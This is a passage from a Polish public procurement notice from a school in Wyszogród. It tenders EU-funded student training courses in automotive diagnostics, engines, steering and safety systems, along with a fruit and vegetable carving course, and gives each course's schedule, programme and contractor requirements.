<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Realizacja szkolenia Budowa i diagnostyka układów klimatyzacj.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 grupa szkoleniowa 10 osobowa - uczniowie Zespołu Szkół im. Jana Śniadeckiego  w Wyszogrodzie

1.Miejsce realizacji: Zespół Szkół im. Jana Śniadeckiego w Wyszogrodzie, ul.Niepodległości 11
2.Termin realizacji: listopad 2014r. 
3.Szczegółowy harmonogram:
-6 godzn dla 1 grupy w ramach 1 spotkania  (1 godzina = 45 min),
-realizacja w dni wolne od zajęć dydaktycznych obowiązkowych (godziny pomiędzy 8.00 a 17.00),
-Wykonawca zapewni przerwy w tym jedną przerwę obiadową trwającą 30 minut.
4.Program szkolenia powinien obejmować część praktyczną i teoretyczną. Zakres szkolenia:
- budowa układów automatycznego ogrzewania i klimatyzacji;
- zasady bezpieczeństwa przy obsłudze układów klimatyzacji;
- obieg czynnika chłodniczego w układach klimatyzacji z zaworem rozprężnym;
- obieg czynnika chłodniczego w układach klimatyzacji z dławnikiem;
- budowa sprężarek, zaworów rozprężnych, dławników, parowników oraz skraplaczy;
- cechy szczególne układów klimatyzacji manualnej i automatycznej;
- czujniki temperatury, nasłonecznienia, wilgotności, zanieczyszczeń powietrza ect.;
- zasady bezpieczeństwa przy obsłudze układów klimatyzacji;
- obsługa układów klimatyzacji;
- sprawdzenie sprawności układów klimatyzacji przez pomiar ciśnień po stronie niskiego i wysokiego ciśnienia;
- sprawdzenie szczelności układu przy próbie podciśnieniowej, nadciśnieniowej;
- lokalizacja nieszczelności;
- diagnostyka automatycznej klimatyzacji;
- wymiana czynnika chłodzącego.
5.Wymagania wobec Wykonawcy:
-Zapewnienie uczestnikom szkolenia materiałów dydaktycznych niezbędnych do utrwalenia wiadomości - mogą to być np. skrypty, kserokopie streszczeń wykładów lub inne materiały informacyjne związane z tematyką prowadzonego szkolenia. Dodatkowo Wykonawca zapewni każdemu uczestnikowi szkolenia długopis oraz notatnik.  Uczestnicy kwitują odbiór materiałów dydaktycznych własnoręcznym podpisem. Oryginał tego pokwitowania Zamawiający otrzyma od Wykonawcy po zakończeniu szkolenia razem z innymi materiałami niezbędnymi do rozliczenia całej usługi.
-Wykonawcy jest zobowiązany do zakupu dziennika zajęć.
-Wykonawca jest zobowiązany do: umieszczenia logo Programu operacyjnego Kapitał Ludzki i logo Unii Europejskiej na wszystkich dokumentach dotyczących realizacji danego szkolenia oraz materiałach szkoleniowych, edukacyjnych, plakatach, broszurach i  zaświadczeniach, certyfikatach.
-Informowanie uczestników o współfinansowaniu zajęć ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego,
- przestrzeganie przepisów o ochronie danych osobowych, zgodnie z ustawą   z dnia 29 sierpnia 1997r. o ochronie danych osobowych,
- Zapewnienie warunków przeprowadzenia zajęć zgodnie z przepisami bezpieczeństwa i higieny pracy,
-Prowadzenie zajęć zgodnie z przedstawionym przez Wykonawcę harmonogramem zajęć, zaakceptowanym przez Zamawiającego,
- prowadzenie dokumentacji przebiegu zajęć pozalekcyjnych na podstawie:
- wpisów w dzienniku zajęć; tematy zajęć edukacyjnych i wymiar godzin,
- listy obecności uczniów z każdego dnia zajęć,
- wypełnione karty pracy przez wykonawców zajęć pozalekcyjnych.
- wydanie uczniom zaświadczeń/certyfikatów o ukończeniu szkolenia z zakresu budowy  i diagnostyki układów klimatyzacji,
 - zapewnienie opieki pedagogicznej uczniom podczas trwania zajęć edukacyjnych.
6.Zamawiający zabezpiecza: salę dydaktyczną i salę do ćwiczeń praktycznych      z możliwością wykorzystania sprzętu multimedialnego.
7.Wykonawca jest zobowiązany do zapewnienia wyżywienia uczestników szkolenia - zapewni każdemu uczestnikowi 1 ciepły posiłek - drugie danie (np. danie mięsne, ziemniaki i surówka) oraz  ciastko,  owoc i napój..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przeprowadzenie szkolenia  z zakresu diagnostyki w praktyce z wykorzystaniem testeru KTS i oscyloskopu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 grupa szkoleniowa 10 osobowa  -  uczniowie Zespołu Szkół im. Jana Śniadeckiego w Wyszogrodzie

1.Miejsce realizacji: Zespół Szkół im. Jana Śniadeckiego w Wyszogrodzie, ul. Niepodległości 11
2.Termin realizacji: grudzień 2014r. 
3.Szczegółowy harmonogram:
-12 godzin dla jednej grupy w ramach 2 spotkań po 6 godzin (1 godzina = 45 min),
-realizacja w dni wolne od zajęć dydaktycznych obowiązkowych (godziny pomiędzy 8.00 a 17.00),
-Wykonawca zapewni przerwy w tym jedną przerwę obiadową trwającą 30 minut.
4.Tematyka programu szkoleniowego powinna zawierać:
Część teoretyczna omawiająca diagnostykę pojazdu samochodowego z wykorzystaniem testera KTS i oscyloskopu oraz ćwiczenia praktyczne z wykorzystaniem powyższych urządzeń.
5.Wymagania wobec Wykonawcy:
-Zapewnienie uczestnikom szkolenia materiałów dydaktycznych niezbędnych do utrwalenia wiadomości - mogą to być np. skrypty, kserokopie streszczeń wykładów lub inne materiały informacyjne związane z tematyką prowadzonego szkolenia. Dodatkowo Wykonawca zapewni każdemu uczestnikowi szkolenia długopis oraz notatnik.  Uczestnicy kwitują odbiór materiałów dydaktycznych własnoręcznym podpisem. Oryginał tego pokwitowania Zamawiający otrzyma od Wykonawcy po zakończeniu szkolenia razem z innymi materiałami niezbędnymi do rozliczenia całej usługi.
-Wykonawcy jest zobowiązany do zakupu dziennika zajęć.
- Wykonawca jest zobowiązany do: umieszczenia logo Programu operacyjnego Kapitał Ludzki i logo Unii Europejskiej na wszystkich dokumentach dotyczących realizacji danego szkolenia oraz materiałach szkoleniowych, edukacyjnych, plakatach, broszurach i  zaświadczeniach, certyfikatach.
-Informowanie uczestników o współfinansowaniu zajęć ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego
- przestrzeganie przepisów o ochronie danych osobowych, zgodnie z ustawą   z dnia 29 sierpnia 1997r. o ochronie danych osobowych,
- Zapewnienie warunków przeprowadzenia zajęć zgodnie z przepisami bezpieczeństwa i higieny pracy,
-Prowadzenie zajęć zgodnie z przedstawionym przez Wykonawcę harmonogramem zajęć, zaakceptowanym przez Zamawiającego,
-prowadzenie dokumentacji przebiegu zajęć pozalekcyjnych na podstawie:
- wpisów w dzienniku zajęć; tematy zajęć edukacyjnych i wymiar godzin,
- listy obecności uczniów z każdego dnia zajęć,
- wypełnione karty pracy przez wykonawców zajęć pozalekcyjnych.
- wydanie uczniom zaświadczeń/certyfikatów o ukończeniu szkolenia z zakresu diagnostyki w praktyce z wykorzystaniem testera KTS i oscyloskopu, 
 - zapewnienie opieki pedagogicznej uczniom podczas trwania zajęć edukacyjnych.
6.Zamawiający zabezpiecza: salę dydaktyczną i salę do ćwiczeń praktycznych      z możliwością wykorzystania sprzętu multimedialnego.
7.Wykonawca jest zobowiązany do zapewnienia wyżywienia uczestników kursu - w każdym dniu prowadzenia zajęć zapewni każdemu uczestnikowi 1 ciepły posiłek - drugie danie (np. danie mięsne, ziemniaki i surówka) oraz  ciastko,  owoc i napój..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Przeprowadzenie szkolenia                   z zakresu podstaw diagnostyki układów elektrycznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 grupa szkoleniowa 10 osobowa  -  uczniowie Zespołu Szkół im. Jana Śniadeckiego w Wyszogrodzie

1.Miejsce realizacji: Zespół Szkół im. Jana Śniadeckiego w Wyszogrodzie,ul. Niepodległości 11
2.Termin realizacji: styczeń 2015r. 
3.Szczegółowy harmonogram:
-12 godzin dla jednej grupy w ramach 2 spotkań po 6 godzin (1 godzina = 45 min),
-realizacja w dni wolne od zajęć dydaktycznych obowiązkowych (godziny pomiędzy 8.00 a 17.00),
-Wykonawca zapewni przerwy w tym jedną przerwę obiadową trwającą 30 minut.
4.Program szkolenia powinien obejmować:
Szkolenie obejmuje naukę łączenia i pomiary podstawowych obwodów prądu stałego i zmiennego, ocenę parametrów podzespołów elektronicznych takich jak: rezystancje, pojemności, indukcyjności, półprzewodników, optoelektroniki oraz podstawowych układów elektroniki analogowej i cyfrowej, posługiwanie się schematami instalacji elektrycznej, oraz diagnostykę z wykorzystaniem miernika uniwersalnego i oscyloskopu.
5.Wymagania wobec Wykonawcy:
-Zapewnienie uczestnikom szkolenia materiałów dydaktycznych niezbędnych do utrwalenia wiadomości - mogą to być np. skrypty, kserokopie streszczeń wykładów lub inne materiały informacyjne związane z tematyką prowadzonego szkolenia. Dodatkowo Wykonawca zapewni każdemu uczestnikowi szkolenia długopis oraz notatnik.  Uczestnicy kwitują odbiór materiałów dydaktycznych własnoręcznym podpisem. Oryginał tego pokwitowania Zamawiający otrzyma od Wykonawcy po zakończeniu szkolenia razem z innymi materiałami niezbędnymi do rozliczenia całej usługi.
-Wykonawcy jest zobowiązany do zakupu dziennika zajęć.
-Wykonawca jest zobowiązany do: umieszczenia logo Programu operacyjnego Kapitał Ludzki i logo Unii Europejskiej na wszystkich dokumentach dotyczących realizacji danego szkolenia oraz materiałach szkoleniowych, edukacyjnych, plakatach, broszurach i  zaświadczeniach, certyfikatach.
-Informowanie uczestników o współfinansowaniu zajęć ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego
- przestrzeganie przepisów o ochronie danych osobowych, zgodnie z ustawą   z dnia 29 sierpnia 1997r. o ochronie danych osobowych,
- Zapewnienie warunków przeprowadzenia zajęć zgodnie z przepisami bezpieczeństwa i higieny pracy,
-Prowadzenie zajęć zgodnie z przedstawionym przez Wykonawcę harmonogramem zajęć, zaakceptowanym przez Zamawiającego,
-prowadzenie dokumentacji przebiegu zajęć pozalekcyjnych na podstawie:
- wpisów w dzienniku zajęć; tematy zajęć edukacyjnych i wymiar godzin,
- listy obecności uczniów z każdego dnia zajęć,
- wypełnione karty pracy przez wykonawców zajęć pozalekcyjnych.
- wydanie uczniom zaświadczeń/certyfikatów o ukończeniu szkolenia, 
- zapewnienie opieki pedagogicznej uczniom podczas trwania zajęć edukacyjnych.
6.Zamawiający zabezpiecza: salę dydaktyczną i salę do ćwiczeń praktycznych    z możliwością wykorzystania sprzętu multimedialnego.
7.Wykonawca jest zobowiązany do zapewnienia wyżywienia uczestników kursu - w każdym dniu prowadzenia zajęć zapewni każdemu uczestnikowi 1 ciepły posiłek - drugie danie (np. danie mięsne, ziemniaki i surówka) oraz  ciastko,  owoc i napój..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Przeprowadzenie szkolenia z zakresu budowy i diagnostyki silników o ZI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 grupa szkoleniowa 10 osobowa  -  uczniowie klas Zespołu Szkół im. Jana Śniadeckiego w Wyszogrodzie

1.Miejsce realizacji: Zespół Szkół im. Jana Śniadeckiego w Wyszogrodzie,ul. Niepodległości 11
2.Termin realizacji: luty 2015r. 
3.Szczegółowy harmonogram:
-6 godzin dla jednej grupy w ramach 1 spotkania (1 godzina = 45 min),
-realizacja w dni wolne od zajęć dydaktycznych obowiązkowych (godziny pomiędzy 8.00 a 17.00),
-Wykonawca zapewni przerwy w tym jedną przerwę obiadową trwającą 30 minut.
4.Program szkolenia powinien obejmować:
Szkolenie obejmuje poznanie budowy, ocenę stanu układów: rozrządu, chłodzenia, korbowo - tłokowego, napędy pasowego oraz ich naprawę, diagnostykę silników, nauka w posługiwaniu się narzędziami i czynności obsługowo - naprawczych.
5.Wymagania wobec Wykonawcy:
-Zapewnienie uczestnikom szkolenia materiałów dydaktycznych niezbędnych do utrwalenia wiadomości - mogą to być np. skrypty, kserokopie streszczeń wykładów lub inne materiały informacyjne związane z tematyką prowadzonego szkolenia. Dodatkowo Wykonawca zapewni każdemu uczestnikowi szkolenia długopis oraz notatnik.  Uczestnicy kwitują odbiór materiałów dydaktycznych własnoręcznym podpisem. Oryginał tego pokwitowania Zamawiający otrzyma od Wykonawcy po zakończeniu szkolenia razem z innymi materiałami niezbędnymi do rozliczenia całej usługi.
-Wykonawcy jest zobowiązany do zakupu dziennika zajęć.
-Wykonawca jest zobowiązany do: umieszczenia logo Programu operacyjnego Kapitał Ludzki i logo Unii Europejskiej na wszystkich dokumentach dotyczących realizacji danego szkolenia oraz materiałach szkoleniowych, edukacyjnych, plakatach, broszurach i  zaświadczeniach, certyfikatach.
-Informowanie uczestników o współfinansowaniu zajęć ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego,
- przestrzeganie przepisów o ochronie danych osobowych, zgodnie z ustawą   z dnia 29 sierpnia 1997r. o ochronie danych osobowych,
- Zapewnienie warunków przeprowadzenia zajęć zgodnie z przepisami bezpieczeństwa i higieny pracy,
-Prowadzenie zajęć zgodnie z przedstawionym przez Wykonawcę harmonogramem zajęć, zaakceptowanym przez Zamawiającego,
- prowadzenie dokumentacji przebiegu zajęć pozalekcyjnych na podstawie:
- wpisów w dzienniku zajęć; tematy zajęć edukacyjnych i wymiar godzin,
- listy obecności uczniów z każdego dnia zajęć,
- wypełnione karty pracy przez wykonawców zajęć pozalekcyjnych.
- wydanie uczniom zaświadczeń/certyfikatów o ukończeniu szkolenia, 
 - zapewnienie opieki pedagogicznej uczniom podczas trwania zajęć edukacyjnych.
6.Zamawiający zabezpiecza: salę dydaktyczną i salę do ćwiczeń praktycznych      z możliwością wykorzystania sprzętu multimedialnego.
7.Wykonawca jest zobowiązany do zapewnienia wyżywienia uczestników kursu - zapewni każdemu uczestnikowi 1 ciepły posiłek - drugie danie (np. danie mięsne, ziemniaki i surówka) oraz  ciastko,  owoc i napój..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> - Przeprowadzenie kursu Carving.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2 grupy szkoleniowe 10 osobowe  -  uczniowie Zespołu Szkół im. Jana Śniadeckiego w Wyszogrodzie

1.Miejsce realizacji: Zespół Szkół im. Jana Śniadeckiego w Wyszogrodzie,ul. Niepodległości 11
2.Termin realizacji: listopad - grudzień 2014r. 
3.Szczegółowy harmonogram:
-18 godzin dla jednej grupy w ramach 3 spotkań po 6 godzin, łącznie dla dwóch grup 36 godziny - 6 spotkań po 6 godzin każde, (1 godzina = 45 min),
-realizacja w dni wolne od zajęć dydaktycznych obowiązkowych (godziny pomiędzy 8.00 a 17.00),
-Wykonawca zapewni przerwy w tym jedną przerwę obiadową trwającą 30 minut.
4.Program szkolenia:
A)CZĘŚĆ TEORETYCZNA - wykład 2 godziny                                                   
1)Historia carvingu na świecie i w Polsce
2)Wyjaśnienie czym jest carving                                              
3)Różnica miedzy garnirowaniem a carvingiem
4)Rodzaje narzędzi do Carvingu.
5)Sposoby i zasady bezpiecznego używania narzędzi .
6)Czynniki decydujące o wyborze owoców  i  warzyw do rzeźbienia.
7)Różne techniki do rzeźbienia owoców i warzyw.
B)CZĘŚĆ PRAKTYCZNA- Zajęcia praktyczne - 16 godzin	
1)Wycinanie liści i kwiatów z różnych owoców i warzyw oraz tworzenie kompozycji  z wykonanych elementów 
2)Wykonanie następujących elementów: 
3)Kwiaty z rzodkiewki (różne wzory )
4)Kwiat z cebuli
5)Szyszka z marchewki
6)Kwiaty z papryki 
7) Kwiaty z cukini  
8)Liście z cukini  
9)Kwiaty z kapusty pekińskiej
10)Róża z kalarepy 
11)Kwiaty w melonie
12)Ozdabianie arbuza   
13)Zasady tworzenia kompozycji z wykonanych elementów.
14)Sposoby przechowywania wyrzeźbionych owoców i warzyw.
5.Wymagania wobec Wykonawcy:
-Zapewnienie uczestnikom na czas realizacji kursu niezbędnego sprzętu, materiałów szkoleniowych oraz wszelkich produktów potrzebnych do realizacji kursu w części teoretycznej i praktycznej w ilości zapewniającej wszystkim uczestnikom kursu wykonanie ćwiczeń w pełnym zakresie zgodnie ze wskazanym programem, w tym w szczególności różnorodnych produktów.
-Zapewnienie uczestnikom szkolenia materiałów dydaktycznych niezbędnych do utrwalenia wiadomości - mogą to być np. skrypty, kserokopie streszczeń wykładów lub inne materiały informacyjne związane z tematyką prowadzonego szkolenia. Dodatkowo Wykonawca zapewni każdemu uczestnikowi szkolenia długopis oraz notatnik.  Uczestnicy kwitują odbiór materiałów dydaktycznych własnoręcznym podpisem. Oryginał tego pokwitowania Zamawiający otrzyma od Wykonawcy po zakończeniu szkolenia razem z innymi materiałami niezbędnymi do rozliczenia całej usługi.
-Wykonawcy jest zobowiązany do zakupu dziennika zajęć dla każdej grupy.
- Wykonawca jest zobowiązany do: umieszczenia logo Programu operacyjnego Kapitał Ludzki i logo Unii Europejskiej na wszystkich dokumentach dotyczących realizacji danego szkolenia oraz materiałach szkoleniowych, edukacyjnych, plakatach, broszurach i  zaświadczeniach, certyfikatach.
-Informowanie uczestników o współfinansowaniu zajęć ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego,
- przestrzeganie przepisów o ochronie danych osobowych, zgodnie z ustawą   z dnia 29 sierpnia 1997r. o ochronie danych osobowych,
- Zapewnienie warunków przeprowadzenia zajęć zgodnie z przepisami bezpieczeństwa  i higieny pracy,
- Prowadzenie zajęć zgodnie z przedstawionym przez Wykonawcę harmonogramem zajęć, zaakceptowanym przez Zamawiającego,
-prowadzenie dokumentacji przebiegu zajęć pozalekcyjnych na podstawie:
- wpisów w dzienniku zajęć; tematy zajęć edukacyjnych i wymiar godzin,
- listy obecności uczniów z każdego dnia zajęć,
- wypełnione karty pracy przez wykonawców zajęć pozalekcyjnych.
- wydanie uczniom zaświadczeń/certyfikatów o ukończeniu szkolenia, 
- zapewnienie opieki pedagogicznej uczniom podczas trwania zajęć edukacyjnych.
6.Zamawiający zabezpiecza: salę dydaktyczną i salę do ćwiczeń praktycznych      z możliwością wykorzystania sprzętu multimedialnego.
7.Wykonawca jest zobowiązany do zapewnienia wyżywienia uczestników kursu - w każdym dniu prowadzenia zajęć zapewni każdemu uczestnikowi 1 ciepły posiłek - drugie danie (np. danie mięsne, ziemniaki i surówka) oraz  ciastko,  owoc i napój..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Przeprowadzenie szkolenia z zakresu diagnostyki silnika z zapłonem iskrowym z wykorzystaniem analizatora spalin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 grupa szkoleniowa 10 osobowa  -  uczniowie  Zespołu Szkół im. Jana Śniadeckiego w Wyszogrodzie

1.Miejsce realizacji: Zespół Szkół im. Jana Śniadeckiego w Wyszogrodzie,  ul. Niepodległości 11.
2.Termin realizacji: marzec 2015r. 
3.Szczegółowy harmonogram:
-6 godzin dla jednej grupy w ramach 1 spotkania (1 godzina = 45 min),
-realizacja w dni wolne od zajęć dydaktycznych obowiązkowych (godziny pomiędzy 8.00 a 17.00),
-Wykonawca zapewni przerwy w tym jedną przerwę obiadową trwającą 30 minut.
4.Program szkolenia:
Szkolenie obejmuje budowę i zasady działania układu zasilania i regulacji składu mieszanki oraz podstawy analizy spalin.
5.Wymagania wobec Wykonawcy:
-Zapewnienie uczestnikom szkolenia materiałów dydaktycznych niezbędnych do utrwalenia wiadomości - mogą to być np. skrypty, kserokopie streszczeń wykładów lub inne materiały informacyjne związane z tematyką prowadzonego szkolenia. Dodatkowo Wykonawca zapewni każdemu uczestnikowi szkolenia długopis oraz notatnik.  Uczestnicy kwitują odbiór materiałów dydaktycznych własnoręcznym podpisem. Oryginał tego pokwitowania Zamawiający otrzyma od Wykonawcy po zakończeniu szkolenia razem z innymi materiałami niezbędnymi do rozliczenia całej usługi.
-Wykonawcy jest zobowiązany do zakupu dziennika zajęć dla każdej grupy.
- Wykonawca jest zobowiązany do: umieszczenia logo Programu operacyjnego Kapitał Ludzki i logo Unii Europejskiej na wszystkich dokumentach dotyczących realizacji danego szkolenia oraz materiałach szkoleniowych, edukacyjnych, plakatach, broszurach i  zaświadczeniach, certyfikatach.
-Informowanie uczestników o współfinansowaniu zajęć ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego,
-przestrzeganie przepisów o ochronie danych osobowych, zgodnie z ustawą   z dnia 29 sierpnia 1997r. o ochronie danych osobowych,
- Zapewnienie warunków przeprowadzenia zajęć zgodnie z przepisami bezpieczeństwa i higieny pracy,
- Prowadzenie zajęć zgodnie z przedstawionym przez Wykonawcę harmonogramem zajęć, zaakceptowanym przez Zamawiającego,
-prowadzenie dokumentacji przebiegu zajęć pozalekcyjnych na podstawie:
- wpisów w dzienniku zajęć; tematy zajęć edukacyjnych i wymiar godzin,
- listy obecności uczniów z każdego dnia zajęć,
- wypełnione karty pracy przez wykonawców zajęć pozalekcyjnych.
- wydanie uczniom zaświadczeń/certyfikatów o ukończeniu szkolenia, 
- zapewnienie opieki pedagogicznej uczniom podczas trwania zajęć edukacyjnych.
6.Zamawiający zabezpiecza: salę dydaktyczną i salę do ćwiczeń praktycznych  z możliwością wykorzystania sprzętu multimedialnego.
7.Wykonawca jest zobowiązany do zapewnienia wyżywienia uczestników kursu - zapewni każdemu uczestnikowi 1 ciepły posiłek - drugie danie (np. danie mięsne, ziemniaki i surówka) oraz  ciastko,  owoc i napój..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Przeprowadzenie szkolenia  z zakresu budowy elementów układów kierowniczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 grupa szkoleniowa 10 osobowa  -  uczniowie  Zespołu Szkół im. Jana Śniadeckiego w Wyszogrodzie

1.Miejsce realizacji: Zespół Szkół im. Jana Śniadeckiego w Wyszogrodzie, ul. Niepodległości 11.
2.Termin realizacji: maj 2015r. 
3.Szczegółowy harmonogram:
-6 godzin dla jednej grupy w ramach 1 spotkania (1 godzina = 45 min),
-realizacja w dzień wolny od zajęć dydaktycznych obowiązkowych (godziny pomiędzy 8.00 a 17.00),
-Wykonawca zapewni przerwy w tym jedną przerwę obiadową trwającą 30 minut.
4.Program szkolenia:
Szkolenie obejmuje poznanie: rodzaje przekładni: przegląd konstrukcji, budowa, funkcjonowanie, wspomaganie hydrauliczne: budowa przekładni wspomaganej hydraulicznie, funkcje i działanie zaworu sterującego, budowa i funkcjonowanie pompy, wspomaganie elektryczno - hydrauliczne, wspomaganie elektryczne, elementy układu: drążki i końcówki kierownicze, osłony gumowe.
5.Wymagania wobec Wykonawcy:
-Zapewnienie uczestnikom szkolenia materiałów dydaktycznych niezbędnych do utrwalenia wiadomości - mogą to być np. skrypty, kserokopie streszczeń wykładów lub inne materiały informacyjne związane z tematyką prowadzonego szkolenia. Dodatkowo Wykonawca zapewni każdemu uczestnikowi szkolenia długopis oraz notatnik.  Uczestnicy kwitują odbiór materiałów dydaktycznych własnoręcznym podpisem. Oryginał tego pokwitowania Zamawiający otrzyma od Wykonawcy po zakończeniu szkolenia razem z innymi materiałami niezbędnymi do rozliczenia całej usługi.
-Wykonawcy jest zobowiązany do zakupu dziennika zajęć.
-Wykonawca jest zobowiązany do: umieszczenia logo Programu operacyjnego Kapitał Ludzki i logo Unii Europejskiej na wszystkich dokumentach dotyczących realizacji danego szkolenia oraz materiałach szkoleniowych, edukacyjnych, plakatach, broszurach i  zaświadczeniach, certyfikatach.
-Informowanie uczestników o współfinansowaniu zajęć ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego,
- przestrzeganie przepisów o ochronie danych osobowych, zgodnie z ustawą   z dnia 29 sierpnia 1997r. o ochronie danych osobowych,
- Zapewnienie warunków przeprowadzenia zajęć zgodnie z przepisami bezpieczeństwa i higieny pracy,
- Prowadzenie zajęć zgodnie z przedstawionym przez Wykonawcę harmonogramem zajęć, zaakceptowanym przez Zamawiającego,
- prowadzenie dokumentacji przebiegu zajęć pozalekcyjnych na podstawie:
- wpisów w dzienniku zajęć; tematy zajęć edukacyjnych i wymiar godzin,
- listy obecności uczniów z każdego dnia zajęć,
- wypełnione karty pracy przez wykonawców zajęć pozalekcyjnych.
- wydanie uczniom zaświadczeń/certyfikatów o ukończeniu szkolenia, 
- zapewnienie opieki pedagogicznej uczniom podczas trwania zajęć edukacyjnych.
6.Zamawiający zabezpiecza: salę dydaktyczną i salę do ćwiczeń praktycznych      z możliwością wykorzystania sprzętu multimedialnego.
7.Wykonawca jest zobowiązany do zapewnienia wyżywienia uczestników kursu - zapewni każdemu uczestnikowi 1 ciepły posiłek - drugie danie (np. danie mięsne, ziemniaki i surówka) oraz  ciastko,  owoc i napój..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Przeprowadzenie szkolenia Diagnostyka i naprawa układów bezpieczeństwa biernego i czynnego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 grupa szkoleniowa 10 osobowa  uczniów Zespołu Szkół im. Jana Śniadeckiego w Wyszogrodzie

1.Miejsce realizacji Zespół Szkół : Zespół Szkół im. Jana Śniadeckiego w Wyszogrodzie, ul. Niepodległości 11,
2.Termin realizacji:  kwiecień  2015r. 
3.Szczegółowy harmonogram:
-6 godzin dla jednej grupy w ramach 1 spotkania (1 godzina = 45 min),
-realizacja w dzień wolny od zajęć dydaktycznych obowiązkowych (godziny pomiędzy 8.00 a 17.00),
-Wykonawca zapewni w każdym dniu prowadzenia zajęć przerwy w tym jedną przerwę obiadową trwającą 30 minut.
4.Program szkolenia.
Szkolenie obejmuje poznanie budowy, zasady działania systemów bezpieczeństwa biernego i czynnego, obsługę i naprawę elementów tych systemów.
5.Wymagania wobec Wykonawcy:
-Zapewnienie uczestnikom szkolenia materiałów dydaktycznych niezbędnych do utrwalenia wiadomości - mogą to być np. skrypty, kserokopie streszczeń wykładów lub inne materiały informacyjne związane z tematyką prowadzonego szkolenia. Dodatkowo Wykonawca zapewni każdemu uczestnikowi szkolenia długopis oraz notatnik.  Uczestnicy kwitują odbiór materiałów dydaktycznych własnoręcznym podpisem. Oryginał tego pokwitowania Zamawiający otrzyma od Wykonawcy po zakończeniu szkolenia razem z innymi materiałami niezbędnymi do rozliczenia całej usługi.
-Wykonawcy jest zobowiązany do zakupu dziennika zajęć.
- Wykonawca jest zobowiązany do: umieszczenia logo Programu operacyjnego Kapitał Ludzki i logo Unii Europejskiej na wszystkich dokumentach dotyczących realizacji danego szkolenia oraz materiałach szkoleniowych, edukacyjnych, plakatach, broszurach i  zaświadczeniach, certyfikatach.
-Informowanie uczestników o współfinansowaniu zajęć ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego,
- przestrzeganie przepisów o ochronie danych osobowych, zgodnie z ustawą   z dnia 29 sierpnia 1997r. o ochronie danych osobowych,
- Zapewnienie warunków przeprowadzenia zajęć zgodnie z przepisami bezpieczeństwa i higieny pracy,
- Prowadzenie zajęć zgodnie z przedstawionym przez Wykonawcę harmonogramem zajęć, zaakceptowanym przez Zamawiającego,
-  prowadzenie dokumentacji przebiegu zajęć pozalekcyjnych na podstawie:
